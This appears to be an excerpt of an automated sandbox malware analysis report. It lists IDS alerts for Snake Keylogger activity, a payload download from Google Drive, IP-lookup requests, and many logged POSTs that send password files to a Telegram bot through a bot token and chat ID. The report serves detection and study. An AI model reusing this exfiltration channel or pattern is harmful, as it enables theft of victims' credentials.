            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49978 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50064 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50046 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50046 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50060 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50060 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50050 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50050 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50054 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50054 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50004 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50052 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50052 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50002 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50062 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50062 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50044 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318ef030315cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a3dcc4e99cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ba1ce8ae90Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31cc23064195Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31de1c6e27dfHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f16a1963c9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3206090b5403Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321939efa937Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322dba261e7eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3240cd792635Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325276d5484dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3266c884144dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3279b0efee4dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328b327df4ccHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329dfebbbd2fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b213189091Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c36d0ba952Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d60ea18c5fHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32e8a22dce36Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32fb286e642dHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd330da1445301Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33200b7db480Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3333b82a72feHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd334605e9befdHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd335d7b5fd182Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3373912f7e9cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd338ae1dad58bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a36afe00b8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33bd2b6aed7dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33d58fba2b56Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33f447b5911dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34142e1138abHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3433fc6c9df6Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3458c368198eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3484fdb0dcfaHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34afcee2471bHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34dbbdda11f8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35154a777d2aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd354d6985ff47Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd358e0f65a80cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35cc02b4df6fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd362136d2c0dbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36827099b96eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49861 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49919 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49827 -> 142.250.181.238:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
